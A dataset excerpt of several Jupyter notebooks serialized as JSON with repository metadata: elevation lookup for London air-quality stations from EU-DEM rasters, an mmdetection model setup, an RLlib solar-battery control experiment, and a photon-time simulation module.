"\n>>> Read London air quality monitoring station data file.\n Unnamed: 0 api_data need_prediction historical_data Latitude Longitude \\\n0 BX9 True NaN True 51.465983 0.184877 \n1 BX1 True NaN True 51.465983 0.184877 \n2 BL0 True True True 51.522287 -0.125848 \n\n SiteType SiteName \n0 Suburban Bexley - Slade Green FDMS \n1 Suburban Bexley - Slade Green \n2 Urban Background Camden - Bloomsbury \n\n*==> The number of stations is: 24\n\n*==> The location (lat, lng) of stations are:\n [[51.46598327 0.18487713]\n [51.46598327 0.18487713]\n [51.522287 -0.125848 ]\n [51.52770662 -0.12905321]\n [51.544219 -0.175284 ]\n [51.51452534 -0.10451563]\n [51.51384718 -0.07776568]\n [51.410039 -0.127523 ]\n [51.490532 0.074003 ]\n [51.45258 0.070766 ]\n [51.486957 0.095111 ]\n [51.456357 0.040725 ]\n [51.4563 0.085606 ]\n [51.617327 -0.298775 ]\n [51.52078746 0.20546071]\n [51.48878 -0.441627 ]\n [51.52104675 -0.21349214]\n [51.52104675 -0.21349214]\n [51.474954 -0.039641 ]\n [51.56948433 0.08290747]\n [51.42525604 -0.34560829]\n [51.3892869 -0.14166153]\n [51.51504617 -0.00841849]\n [51.52254 -0.15459 ]]\n\n>>> Complete!\n\n"
],
[
"# <EUDEMv11> Get the elevation from DEM in WGS-84 GCS.\n\nprint('\\n>>> <EUDEMv11> Get the elevation from DEM in WGS-84 GCS.')\n\ndem_gcs = gdal.Open(PATH_EUDEM + EUDEM_GCS_WD)\nget_dem_info(dem_gcs, if_print=True)\n\nsite_ele_eudem_wgs = get_elevation(dem_gcs, site_latlng)\nnp.set_printoptions(suppress=True)\n\nprint('\\n*==> The elevation information of stations is:\\n', site_ele_eudem_wgs)\nprint('\\n*==> The elevation value of stations is:\\n', site_ele_eudem_wgs[:, 5].astype(int))\n\nprint('\\n>>> Complete!\\n')\n",
"\n>>> <EUDEMv11> Get the elevation from DEM in WGS-84 GCS.\n\nThe information of DEM:\nThe number of row (height) is: 30505\nThe number of column (width) is: 52428\nThe number of band is: 1\nThe 6 GeoTransform parameters are:\n (-12.266271034206424, 0.00033920980218715875, 0.0, 58.98761768429964, 0.0, -0.00033920980218715875)\nThe GCS/PCS information is:\n GEOGCS[\"WGS 84\",DATUM[\"WGS_1984\",SPHEROID[\"WGS 84\",6378137,298.257223563,AUTHORITY[\"EPSG\",\"7030\"]],AUTHORITY[\"EPSG\",\"6326\"]],PRIMEM[\"Greenwich\",0],UNIT[\"degree\",0.0174532925199433],AUTHORITY[\"EPSG\",\"4326\"]]\n\nThe 6 GeoTransform parameters of DEM are:\n (-12.266271034206424, 0.00033920980218715875, 0.0, 58.98761768429964, 0.0, -0.00033920980218715875)\n\n*==> The elevation information of stations is:\n [[ 0. 51.46598327 0.18487713 22174.\n 36706. 12.63551998]\n [ 1. 51.46598327 0.18487713 22174.\n 36706. 12.63551998]\n [ 2. 51.522287 -0.125848 22008.\n 35790. 37.60099411]\n [ 3. 51.52770662 -0.12905321 21992.\n 35781. 30.68862724]\n [ 4. 51.544219 -0.175284 21943.\n 35645. 61.01919174]\n [ 5. 51.51452534 -0.10451563 22031.\n 35853. 25.66654587]\n [ 6. 51.51384718 -0.07776568 22033.\n 35932. 29.40543556]\n [ 7. 51.410039 -0.127523 22339.\n 35785. 36.34508514]\n [ 8. 51.490532 0.074003 22102.\n 36379. 11.27258968]\n [ 9. 51.45258 0.070766 22214.\n 36370. 66.39667511]\n [ 10. 51.486957 0.095111 22112.\n 36442. 11.88549519]\n [ 11. 51.456357 0.040725 22202.\n 36281. 31.31890869]\n [ 12. 51.4563 0.085606 22203.\n 36414. 64.95016479]\n [ 13. 51.617327 -0.298775 21728.\n 35281. 79.23999786]\n [ 14. 51.52078746 0.20546071 22012.\n 36767. 7.36576653]\n [ 15. 51.48878 -0.441627 22107.\n 34859. 27.24001312]\n [ 16. 51.52104675 -0.21349214 22012.\n 35532. 25.52720642]\n [ 17. 51.52104675 -0.21349214 22012.\n 35532. 25.52720642]\n [ 18. 51.474954 -0.039641 22148.\n 36044. 14.32332325]\n [ 19. 51.56948433 0.08290747 21869.\n 36406. 15.99652195]\n [ 20. 51.42525604 -0.34560829 22294.\n 35142. 13.35388565]\n [ 21. 51.3892869 -0.14166153 22400.\n 35744. 32.15060806]\n [ 22. 51.51504617 -0.00841849 22029.\n 36136. 5.19105673]\n [ 23. 51.52254 -0.15459 22007.\n 35706. 36.85784912]]\n\n*==> The elevation value of stations is:\n [12 12 37 30 61 25 29 36 11 66 11 31 64 79 7 27 25 25 14 15 13 32 5 36]\n\n>>> Complete!\n\n"
],
[
"# <EUDEMv11> Get the elevation from DEM in OSGB-36 GCS.\n\nprint('\\n>>> <EUDEMv11> Get the elevation from DEM in OSGB-36 GCS.')\n\ndem_gcs = gdal.Open(PATH_EUDEM + EUDEM_GCS_UK)\nget_dem_info(dem_gcs, if_print=True)\n\nsite_ele_eudem_osgb = get_elevation(dem_gcs, site_latlng)\nnp.set_printoptions(suppress=True)\n\nprint('\\n*==> The elevation information of stations is:\\n', site_ele_eudem_osgb)\nprint('\\n*==> The elevation value of stations is:\\n', site_ele_eudem_osgb[:, 5].astype(int))\n\nprint('\\n>>> Complete!\\n')\n",
"\n>>> <EUDEMv11> Get the elevation from DEM in OSGB-36 GCS.\n\nThe information of DEM:\nThe number of row (height) is: 30506\nThe number of column (width) is: 52430\nThe number of band is: 1\nThe 6 GeoTransform parameters are:\n (-12.266102928602475, 0.0003392475335051166, 0.0, 58.98812292836723, 0.0, -0.0003392475335051166)\nThe GCS/PCS information is:\n GEOGCS[\"OSGB 1936\",DATUM[\"OSGB_1936\",SPHEROID[\"Airy 1830\",6377563.396,299.3249646000044,AUTHORITY[\"EPSG\",\"7001\"]],TOWGS84[446.448,-125.157,542.06,0.15,0.247,0.842,-20.489],AUTHORITY[\"EPSG\",\"6277\"]],PRIMEM[\"Greenwich\",0],UNIT[\"degree\",0.0174532925199433],AUTHORITY[\"EPSG\",\"4277\"]]\n\nThe 6 GeoTransform parameters of DEM are:\n (-12.266102928602475, 0.0003392475335051166, 0.0, 58.98812292836723, 0.0, -0.0003392475335051166)\n\n*==> The elevation information of stations is:\n [[ 0. 51.46598327 0.18487713 22173.\n 36702. 12.47727203]\n [ 1. 51.46598327 0.18487713 22173.\n 36702. 12.47727203]\n [ 2. 51.522287 -0.125848 22007.\n 35786. 37.75251389]\n [ 3. 51.52770662 -0.12905321 21991.\n 35776. 26.8823452 ]\n [ 4. 51.544219 -0.175284 21942.\n 35640. 58.50819397]\n [ 5. 51.51452534 -0.10451563 22030.\n 35849. 30.98666763]\n [ 6. 51.51384718 -0.07776568 22032.\n 35928. 32.92979813]\n [ 7. 51.410039 -0.127523 22338.\n 35781. 35.5172081 ]\n [ 8. 51.490532 0.074003 22101.\n 36375. 11.85224247]\n [ 9. 51.45258 0.070766 22213.\n 36365. 71.22161865]\n [ 10. 51.486957 0.095111 22111.\n 36437. 8.77665329]\n [ 11. 51.456357 0.040725 22201.\n 36277. 30.45423889]\n [ 12. 51.4563 0.085606 22202.\n 36409. 66.69743347]\n [ 13. 51.617327 -0.298775 21727.\n 35276. 78.91999817]\n [ 14. 51.52078746 0.20546071 22011.\n 36762. 8.10325527]\n [ 15. 51.48878 -0.441627 22106.\n 34855. 26.04798698]\n [ 16. 51.52104675 -0.21349214 22011.\n 35527. 24.9171505 ]\n [ 17. 51.52104675 -0.21349214 22011.\n 35527. 24.9171505 ]\n [ 18. 51.474954 -0.039641 22147.\n 36040. 8.97394276]\n [ 19. 51.56948433 0.08290747 21868.\n 36401. 16.96926498]\n [ 20. 51.42525604 -0.34560829 22293.\n 35138. 13.82033825]\n [ 21. 51.3892869 -0.14166153 22399.\n 35739. 32.94750977]\n [ 22. 51.51504617 -0.00841849 22028.\n 36132. 9.25135612]\n [ 23. 51.52254 -0.15459 22006.\n 35701. 35.54499435]]\n\n*==> The elevation value of stations is:\n [12 12 37 26 58 30 32 35 11 71 8 30 66 78 8 26 24 24 8 16 13 32 9 35]\n\n>>> Complete!\n\n"
],
[
"# <EUDEMv11> Get the elevation from DEM in ETRS-89 GCS.\n\nprint('\\n>>> <EUDEMv11> Get the elevation from DEM in ETRS-89 GCS.')\n\ndem_gcs = gdal.Open(PATH_EUDEM + EUDEM_GCS_EU)\nget_dem_info(dem_gcs, if_print=True)\n\nsite_ele_eudem_etrs = get_elevation(dem_gcs, site_latlng)\nnp.set_printoptions(suppress=True)\n\nprint('\\n*==> The elevation information of stations is:\\n', site_ele_eudem_etrs)\nprint('\\n*==> The elevation value of stations is:\\n', site_ele_eudem_etrs[:, 5].astype(int))\n\nprint('\\n>>> Complete!\\n')\n",
"\n>>> <EUDEMv11> Get the elevation from DEM in ETRS-89 GCS.\n\nThe information of DEM:\nThe number of row (height) is: 30505\nThe number of column (width) is: 52428\nThe number of band is: 1\nThe 6 GeoTransform parameters are:\n (-12.266271034206424, 0.00033920980218715875, 0.0, 58.98761768429964, 0.0, -0.00033920980218715875)\nThe GCS/PCS information is:\n GEOGCS[\"ETRS89\",DATUM[\"European_Terrestrial_Reference_System_1989\",SPHEROID[\"GRS 1980\",6378137,298.2572221010002,AUTHORITY[\"EPSG\",\"7019\"]],TOWGS84[0,0,0,0,0,0,0],AUTHORITY[\"EPSG\",\"6258\"]],PRIMEM[\"Greenwich\",0],UNIT[\"degree\",0.0174532925199433],AUTHORITY[\"EPSG\",\"4258\"]]\n\nThe 6 GeoTransform parameters of DEM are:\n (-12.266271034206424, 0.00033920980218715875, 0.0, 58.98761768429964, 0.0, -0.00033920980218715875)\n\n*==> The elevation information of stations is:\n [[ 0. 51.46598327 0.18487713 22174.\n 36706. 12.63551998]\n [ 1. 51.46598327 0.18487713 22174.\n 36706. 12.63551998]\n [ 2. 51.522287 -0.125848 22008.\n 35790. 37.60099411]\n [ 3. 51.52770662 -0.12905321 21992.\n 35781. 30.68862724]\n [ 4. 51.544219 -0.175284 21943.\n 35645. 61.01919174]\n [ 5. 51.51452534 -0.10451563 22031.\n 35853. 25.66654587]\n [ 6. 51.51384718 -0.07776568 22033.\n 35932. 29.40543556]\n [ 7. 51.410039 -0.127523 22339.\n 35785. 36.34508514]\n [ 8. 51.490532 0.074003 22102.\n 36379. 11.27258968]\n [ 9. 51.45258 0.070766 22214.\n 36370. 66.39667511]\n [ 10. 51.486957 0.095111 22112.\n 36442. 11.88549519]\n [ 11. 51.456357 0.040725 22202.\n 36281. 31.31890869]\n [ 12. 51.4563 0.085606 22203.\n 36414. 64.95016479]\n [ 13. 51.617327 -0.298775 21728.\n 35281. 79.23999786]\n [ 14. 51.52078746 0.20546071 22012.\n 36767. 7.36576653]\n [ 15. 51.48878 -0.441627 22107.\n 34859. 27.24001312]\n [ 16. 51.52104675 -0.21349214 22012.\n 35532. 25.52720642]\n [ 17. 51.52104675 -0.21349214 22012.\n 35532. 25.52720642]\n [ 18. 51.474954 -0.039641 22148.\n 36044. 14.32332325]\n [ 19. 51.56948433 0.08290747 21869.\n 36406. 15.99652195]\n [ 20. 51.42525604 -0.34560829 22294.\n 35142. 13.35388565]\n [ 21. 51.3892869 -0.14166153 22400.\n 35744. 32.15060806]\n [ 22. 51.51504617 -0.00841849 22029.\n 36136. 5.19105673]\n [ 23. 51.52254 -0.15459 22007.\n 35706. 36.85784912]]\n\n*==> The elevation value of stations is:\n [12 12 37 30 61 25 29 36 11 66 11 31 64 79 7 27 25 25 14 15 13 32 5 36]\n\n>>> Complete!\n\n"
],
[
"# Compare the elevation obtained from different DEMs.\n\nprint('\\n>>> Compare the elevation obtained from different DEMs.')\n\nprint('\\nEUDEMv11_WD', site_ele_eudem_wgs[:, 5].astype(int))\nprint('\\nEUDEMv11_UK', site_ele_eudem_osgb[:, 5].astype(int))\nprint('\\nEUDEMv11_EU', site_ele_eudem_etrs[:, 5].astype(int))\n\nprint('\\n>>> Complete!\\n')\n",
"\n>>> Compare the elevation obtained from different DEMs.\n\nEUDEMv11_WD [12 12 37 30 61 25 29 36 11 66 11 31 64 79 7 27 25 25 14 15 13 32 5 36]\n\nEUDEMv11_UK [12 12 37 26 58 30 32 35 11 71 8 30 66 78 8 26 24 24 8 16 13 32 9 35]\n\nEUDEMv11_EU [12 12 37 30 61 25 29 36 11 66 11 31 64 79 7 27 25 25 14 15 13 32 5 36]\n\n>>> Complete!\n\n"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
e706abda776e1137a2f2c187f2142bde394f8a40 | 1,134 | ipynb | Jupyter Notebook | Untitled.ipynb | Yusoi/mmdetection | cbb5fb00f6e124fbb2c15e7e3438d7fa76b8850a | [
"Apache-2.0"
] | null | null | null | Untitled.ipynb | Yusoi/mmdetection | cbb5fb00f6e124fbb2c15e7e3438d7fa76b8850a | [
"Apache-2.0"
] | null | null | null | Untitled.ipynb | Yusoi/mmdetection | cbb5fb00f6e124fbb2c15e7e3438d7fa76b8850a | [
"Apache-2.0"
] | null | null | null | 22.235294 | 68 | 0.580247 | [
[
[
"from mmdet.apis import init_detector, inference_detector\nimport mmcv\n\n# Specify the path to model config and checkpoint file\nconfig_file = 'configs/custom/mask_rcnn_r50_fpn_1x_coco.py'\n\n# build the model from a config file and a checkpoint file\nmodel = init_detector(config_file, device='cuda:0')",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code"
]
] |
e706b82d31613a116fc3d7a7d8ae08e04b8c0ae7 | 12,539 | ipynb | Jupyter Notebook | notebooks/exploratory/rdnfn_018_callback_test.ipynb | rdnfn/solar-agent | 630ce26816f5dfccb3c4662c683c59e4a362aef6 | [
"MIT"
] | 4 | 2021-05-19T13:30:13.000Z | 2022-02-07T22:54:12.000Z | notebooks/exploratory/rdnfn_018_callback_test.ipynb | rdnfn/solar-agent | 630ce26816f5dfccb3c4662c683c59e4a362aef6 | [
"MIT"
] | null | null | null | notebooks/exploratory/rdnfn_018_callback_test.ipynb | rdnfn/solar-agent | 630ce26816f5dfccb3c4662c683c59e4a362aef6 | [
"MIT"
] | 2 | 2021-05-19T13:31:23.000Z | 2021-07-01T14:02:16.000Z | 37.768072 | 531 | 0.522131 | [
[
[
"# Experiment Collection #01\n\nThis notebook contains experiments regarding the use of a penalty term.",
"_____no_output_____"
],
[
"## 1. Basic Setup",
"_____no_output_____"
]
],
[
[
"# Jupyter setup\n%load_ext autoreload\n%autoreload 2\n%config IPCompleter.greedy=True",
"_____no_output_____"
],
[
"import ray\nray.shutdown()",
"_____no_output_____"
],
[
"import ray\nimport ray.rllib\nimport ray.tune \nimport solara.envs.creator\n\n## Initialising ray (starts background process for distributed computing)\nray.shutdown()\nray.init(logging_level=\"WARNING\", object_store_memory= 25 * 10**9)\n\n# Adding environment creator function to ray\nray.tune.registry.register_env(\"battery_control\", solara.envs.creator.create_env)",
"_____no_output_____"
]
],
[
[
"## 2. Experiment Definition",
"_____no_output_____"
]
],
[
[
"from solara.constants import PROJECT_PATH\n\n# RL environment configuration\nENV_CONFIG = {\n 'general': {\n 'type': 'battery_control.BatteryControlEnv',\n 'infeasible_control_penalty': ray.tune.grid_search([False, True]),\n 'grid_charging': ray.tune.grid_search([True, False]),\n 'logging_level': \"RAY\", # if using RLlib, set to 'RAY'\n },\n 'components': {\n 'battery': {\n 'type': 'LithiumIonBattery',\n 'size': 10,\n 'chemistry': 'NMC',\n 'time_step_len': 1,\n },\n 'solar': {\n 'type': 'DataPV',\n 'data_path': PROJECT_PATH + \"/data/solar_trace_data/PV_5796.txt\",\n 'fixed_sample_num': 12,\n },\n 'load': {\n 'type': 'DataLoad',\n 'data_path': PROJECT_PATH + \"/data/solar_trace_data/load_5796.txt\",\n 'fixed_sample_num': 12,\n },\n 'grid': {\n 'type': 'PeakGrid',\n 'peak_threshold': 1.0,\n },\n },\n}\n\n# RL agent configuration\nAGENT_CONFIG = {\n \"framework\": \"torch\",\n #\"num_workers\": 9,\n #\"num_gpus\": 1,\n \"env\": \"battery_control\",\n \"env_config\": ENV_CONFIG,\n \"gamma\": 0.9999999,\n \"log_level\": \"WARNING\",\n \"lr\": 5e-5,\n \"model\": {\n \"fcnet_hiddens\": [256, 256, 256, 256],\n \"fcnet_activation\": \"relu\",\n \"post_fcnet_activation\": \"tanh\",\n },\n}\n\n# Full experiment configuration including RL algorithm type\nEXPERIMENT_CONFIG = {\n \"run_or_experiment\": \"PPO\",\n \"config\": AGENT_CONFIG,\n \"stop\": {\"training_iteration\": 2},\n \"local_dir\": \"./tmp/tune/\",\n \"log_to_file\": True,\n \"checkpoint_freq\": 1,\n}",
"_____no_output_____"
],
[
"# Parallelisation Setup\nif False:\n num_workers = 4\n gpu_count = 1\n reserved_capacity = 0.01 # Driver GPU\n num_gpus_per_worker = (gpu_count - reserved_capacity) / num_workers\n\n\n AGENT_CONFIG[\"num_workers\"] = num_workers\n AGENT_CONFIG[\"num_gpus\"] = num_gpus\n AGENT_CONFIG[\"num_envs_per_worker\"]= 8\n \n\n#AGENT_CONFIG[\"num_gpus\"] = 1\n#AGENT_CONFIG[\"num_envs_per_worker\"]= 8\nAGENT_CONFIG[\"num_workers\"] = 10\nAGENT_CONFIG[\"num_gpus\"] = 1\n#AGENT_CONFIG[\"remote_worker_envs\"]= True",
"_____no_output_____"
],
[
"from ray.rllib.evaluation import RolloutWorker\n\nfrom ray.rllib.env import BaseEnv\nfrom ray.rllib.policy import Policy\nfrom ray.rllib.policy.sample_batch import SampleBatch\nfrom ray.rllib.evaluation import MultiAgentEpisode\nfrom ray.rllib.utils.annotations import PublicAPI\nfrom ray.rllib.utils.deprecation import deprecation_warning\nfrom ray.rllib.utils.typing import AgentID, PolicyID\n\nfrom typing import Dict, Optional, TYPE_CHECKING\n\nimport numpy as np\n\n\nclass MyCallbacks(ray.rllib.agents.callbacks.DefaultCallbacks):\n \"\"\"Callback to add additional metrics over the training process from step infos.\"\"\"\n \n info_keys = [\"cost\", \"power_diff\", \"battery_cont\"]\n \n def on_episode_start(self, *, worker: RolloutWorker, base_env: BaseEnv,\n policies: Dict[str, Policy],\n episode: MultiAgentEpisode, env_index: int, **kwargs):\n \n episode.user_data[\"infos\"] = []\n\n def on_episode_step(self, *, worker: RolloutWorker, base_env: BaseEnv,\n episode: MultiAgentEpisode, env_index: int, **kwargs):\n \n episode.user_data[\"infos\"].append(episode.last_info_for())\n\n def on_episode_end(self, *, worker: RolloutWorker, base_env: BaseEnv,\n policies: Dict[str, Policy], episode: MultiAgentEpisode,\n env_index: int, **kwargs):\n \n for key in self.info_keys:\n if key in episode.user_data[\"infos\"][0].keys():\n key_data = [info[key] for info in episode.user_data[\"infos\"]]\n episode.custom_metrics[key] = sum(key_data)\n \nAGENT_CONFIG[\"callbacks\"] = MyCallbacks\n#AGENT_CONFIG.pop(\"callbacks\")",
"_____no_output_____"
],
[
"reporter = ray.tune.JupyterNotebookReporter(overwrite=True)\nreporter.add_metric_column(\"custom_metrics/cost_mean\")\nreporter.add_metric_column(\"custom_metrics/power_diff_mean\")\n\nanalysis = ray.tune.run(\n progress_reporter=reporter,\n **EXPERIMENT_CONFIG,\n#resume=True\n)",
"_____no_output_____"
],
[
"ray.tune.JupyterNotebookReporter(overwrite=True).DEFAULT_COLUMNS",
"_____no_output_____"
],
[
"ray.rllibJupyterNotebookReporterainer",
"_____no_output_____"
],
[
"analysis.results",
"_____no_output_____"
],
[
"ray.rllib.agents.ppo.PPOTrainer(config=AGENT_CONFIG)",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
e706c0fde2111ce2617dd815573e4bb93b186d55 | 33,207 | ipynb | Jupyter Notebook | nbs/04_simulation.ipynb | tburnett/wtlike | 0a0f0c807fd32a625f653c94be83b093b9abec5d | [
"Apache-2.0"
] | 3 | 2020-12-27T02:49:00.000Z | 2022-03-20T07:20:53.000Z | nbs/04_simulation.ipynb | tburnett/wtlike | 0a0f0c807fd32a625f653c94be83b093b9abec5d | [
"Apache-2.0"
] | 3 | 2021-05-20T23:14:35.000Z | 2022-02-26T10:25:25.000Z | nbs/04_simulation.ipynb | tburnett/wtlike | 0a0f0c807fd32a625f653c94be83b093b9abec5d | [
"Apache-2.0"
] | 1 | 2021-11-15T10:23:22.000Z | 2021-11-15T10:23:22.000Z | 72.822368 | 19,932 | 0.780197 | [
[
[
"# default_exp simulation\nfrom nbdev import *\nfrom utilities.ipynb_docgen import *\n\n%reload_ext autoreload\n%autoreload 2",
"_____no_output_____"
]
],
[
[
"# Simulation\n> Generate simulated data",
"_____no_output_____"
]
],
[
[
"# export\nimport os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom scipy import stats\n\nfrom wtlike.config import Config\nfrom wtlike.weights import PointSource",
"_____no_output_____"
],
[
"# export\nimport numbers\n\nclass _Sampler():\n \"\"\" Sample an arbitrary function or histogram\n\n - func -- a function, a histogram, or a fixed value<br>\n If a function, must be positive definite.<br>\n Assume histogram bins are 0 to 1.\n - a,b -- limits (default 0,1)\n - n -- table size (ignored if a histogram or value)\n\n \"\"\"\n\n def __init__(self, func, limits=(0,1), n=100):\n\n a,b = limits\n self.x = np.linspace(a,b,n+1) # bin edges\n dx = (b-a)/(n)/2\n self.deltafun=None\n\n if callable(func):\n # A function\n # evaluate at bin centers\n y = np.array([func(t-dx) for t in self.x])\n if np.any(y<0) or np.sum(y)==0:\n raise ValueError('Function is not positive definite')\n elif isinstance(func, numbers.Number):\n # a single value, or delta function\n self.deltafun = func\n if func<0 or func>1:\n raise ValueError('Value not in range [0,1]')\n self.mean=func\n return\n else:\n n = len(func)\n self.x = np.linspace(a,b,n)\n y = func\n cy = np.cumsum(y)\n d = cy[-1]-cy[0]\n self.sy = (cy-cy[0])/d\n\n self.mean = np.sum( (self.x-dx) * y) / d\n\n def _evaluate(self, r):\n \"\"\"evaluate inverse integral. expect 0<r<1 \"\"\"\n return np.interp(r, self.sy, self.x)\n\n def __call__(self, size):\n \"\"\"Generate `size` values\n \"\"\"\n if self.deltafun: return np.full(size, self.deltafun)\n\n return self._evaluate(stats.uniform.rvs(size=size))",
"_____no_output_____"
]
],
[
[
"### Gaussian and quadratic example functions\n",
"_____no_output_____"
]
],
[
[
"# collapse_input\nn = 20\nsf = _Sampler(lambda x: np.exp(-(x**2)/2), limits=(-4, 4) )\n\ndata = sf(10000)\ntests = np.array([np.abs(data.mean()), np.abs(data.std()-1) ])\nassert np.all(tests<5e-2 ), f'Failed Tests: mean {data.mean()}, std {data.std()}'\n\nfunc = lambda x: x**2\nwfun = _Sampler(func)\n\ntest2 = wfun.mean, np.mean(wfun(1000))\nassert np.abs( test2[0]-test2[1] ) < 1e-1, f'Not almost equal: {test2}'",
"_____no_output_____"
]
],
[
[
"### Test generating weights from a source weight histogram",
"_____no_output_____"
],
[
"Test with a function peaked at both ends, generate equal signal and background",
"_____no_output_____"
],
[
"## Simulate times and weights",
"_____no_output_____"
]
],
[
[
"# export\nsec_per_day = 24*3600\n\ndef generate_times(start, stop, count):\n \"\"\" Generate a list of times, distributed randomly\n\n - start, stop: times\n - count : expected number to generate with rate=count/(stop-start)\n\n returns : list of times between start and stop. Note that the actual number is Poisson-distributed\n \"\"\"\n # note: can speed this up by making groups of random calls\n\n tt =[]\n t = start\n scale = (stop-start)/count\n while True:\n t += np.random.exponential(scale =scale)\n if t>stop: break\n tt.append(t)\n return tt",
"_____no_output_____"
],
[
"t = np.random.exponential(1, 100); \n#dt = np.diff(t); pd.Series.describe(dt)\ndt = np.diff(t)\npd.Series(dt).describe()",
"_____no_output_____"
],
[
"#export\nclass WeightFunction(object):\n\n def __init__(self, s=1,b=1, wt_signif=0.1):\n self.s = s\n self.b = b\n self.lam = wt_signif\n\n def __call__(self, r):\n return (self.s * np.exp(-r/self.lam)/(self.lam*(1-np.exp(-1/self.lam))) + self.b)\n\n def sample(self, s,b, n):\n self.s = s\n self.b = b\n return _Sampler(self, n=1000)(n);\n\n def weights(self, s, b, n):\n h = self.sample(s,b,n)\n return 1-b/self(h)",
"_____no_output_____"
],
[
"#hide\n# test weight function\ns,b, lam = 1,1,0.1\n\nr = np.linspace(0,1, 1000) \nwfun = WeightFunction(s=s,b=b,wt_signif=lam)\nsamp = wfun.sample(s,b, 10000); \nwts = wfun.weights(s,b, 10000);\n\n\nfig, (ax1, ax2, ax3) = plt.subplots(1,3, figsize=(15,4), sharex=True)\nax1.plot(r, wfun(r), '-')\nax1.set(ylim=(0,None), xlim=(0,1), title='function');\nax2.hist(samp, 100);\nax2.set(title='sampled', xlabel='zeta value');\nax3.hist(wts, bins=np.linspace(0,1,101));\nax3.set(title='weights');",
"_____no_output_____"
],
[
"#export\ndef make_exposure(fexp, start, stop, interval=300):\n \"\"\"\n - fexp -- exposure in cm^2, a value or a function of time in day units\n - start, stop -- range of time in day units\n - interval [300] -- 5-min interval (fermi data is 30 s)\n\n Returns: a DataFrame with start, stop, exp\n \"\"\"\n def check_scalar( f):\n if np.isscalar(f):\n fval = f\n return lambda t: fval\n return f\n fexp = check_scalar(fexp)\n\n nbins = int((stop-start)*sec_per_day / interval)\n edges = np.linspace(start, start+nbins*interval/sec_per_day, nbins+1)\n starts, stops = edges[:-1], edges[1:]\n exp = fexp(starts) * interval\n return pd.DataFrame.from_dict(dict(start=starts, stop=stops, exp=exp))\n\n# exp = make_exposure(500, 0, 1 )\n# days = np.sum(exp.stop-exp.start); secs = days*24*3600\n# exptot=np.sum(exp.exp)\n# exp_text = f' average {exptot/secs:.0f} cm^2 for {secs/1e6:.1f} Ms'\n# print(exp_text)\n# exp.head()",
"_____no_output_____"
],
[
"# export\nclass Simulation(object):\n\n def __init__(self, name, src_flux, tstart, tstop, bkg_rate=1e-6, efun=3000, wt_signif=0.1):\n \"\"\"\n - src_flux : source flux, scalar or function of days, typically around 1e-7\n - tstart, tstop :(days)\n - bkg_rate : background flux, scalar or function of day, typicaly 1e-6 for 4-deg cone\n - efun : scalar, function (of time in days) of the exposure/s. Typically 3000 cm^2 for fermi\n\n - wt_signif : now the width of the PSF in (r/rmax)**2 coordinates\n\n \"\"\"\n def check_scalar( f):\n if np.isscalar(f):\n fval = f\n return lambda t: fval\n return f\n self.name = name\n self.src_fun = check_scalar(src_flux)\n self.bkg_fun = check_scalar(bkg_rate)\n self.flux_fun = lambda t: src_fun(t)+bkg_fun(t)\n self.wt_signif=wt_signif\n\n self.exposure = make_exposure(efun, tstart, tstop)\n\n\n def run(self):\n times = []\n weights = []\n for start, stop, exp in self.exposure.itertuples(index=False,name=None):\n\n src = self.src_fun((start+stop)/2)\n bkg = self.bkg_fun((start+stop)/2)\n delta_t = (stop-start)*sec_per_day # tolal tim\n counts = (src+bkg) * exp #\n #print(f'From {start} to {stop}, exposure/s {exp/delta_t:.0f}, counts {counts:.0f}')\n new_times = generate_times(start, stop, counts)\n wfun = WeightFunction(wt_signif=self.wt_signif)\n new_wts = wfun.weights(s=src, b=bkg, n=len(new_times));\n\n assert len(new_times)==len(new_wts)\n times = np.append(times, new_times)\n weights = np.append(weights, new_wts)\n\n print(f'generated {len(times)} photons')\n self.photons=pd.DataFrame(dict(\n time=times,\n weight=weights.astype(np.float32),\n ))",
"_____no_output_____"
],
[
"#hide\ndef src_flare(t, tzero=15, width=0.25, amp=2):\n return 1e-6*(1 + amp*np.exp(-(t-tzero)**2/2/width))\nsim = Simulation('test_sim', src_flux=src_flare, tstart=0, tstop=10, )\n%time sim.run()",
"generated 5199 photons\nCPU times: user 18.1 s, sys: 0 ns, total: 18.1 s\nWall time: 18.1 s\n"
]
],
[
[
"## Test varying exposure\n",
"_____no_output_____"
]
],
[
[
"#hide\nfrom nbdev.export import notebook2script\nnotebook2script()\n!date",
"Converted 00_config.ipynb.\nConverted 01_data_man.ipynb.\nConverted 02_effective_area.ipynb.\nConverted 03_exposure.ipynb.\nConverted 03_sources.ipynb.\nConverted 04_load_data.ipynb.\nConverted 04_simulation.ipynb.\nConverted 05_source_data.ipynb.\nConverted 06_poisson.ipynb.\nConverted 07_loglike.ipynb.\nConverted 08_cell_data.ipynb.\nConverted 09_lightcurve.ipynb.\nConverted 14_bayesian.ipynb.\nConverted 90_main.ipynb.\nConverted 99_tutorial.ipynb.\nConverted index.ipynb.\nTue Aug 24 16:29:26 PDT 2021\n"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
e706c92f17d08379c9105395960e3aa28bb2b43b | 6,611 | ipynb | Jupyter Notebook | boards/Pynq-Z2/base/notebooks/rpi/rpi_touchpad.ipynb | jackrosenthal/PYNQ | 788bf18529bc7a0564af4033ef3e246c03fc5b10 | [
"BSD-3-Clause"
] | 1,537 | 2016-09-26T22:51:50.000Z | 2022-03-31T13:33:54.000Z | boards/Pynq-Z2/base/notebooks/rpi/rpi_touchpad.ipynb | MakarenaLabs/PYNQ | 6f3113278e62b23315cf4e000df8f57fb53c4f6d | [
"BSD-3-Clause"
] | 414 | 2016-10-03T21:12:10.000Z | 2022-03-21T14:55:02.000Z | boards/Pynq-Z2/base/notebooks/rpi/rpi_touchpad.ipynb | MakarenaLabs/PYNQ | 6f3113278e62b23315cf4e000df8f57fb53c4f6d | [
"BSD-3-Clause"
] | 826 | 2016-09-23T22:29:43.000Z | 2022-03-29T11:02:09.000Z | 24.66791 | 119 | 0.504765 | [
[
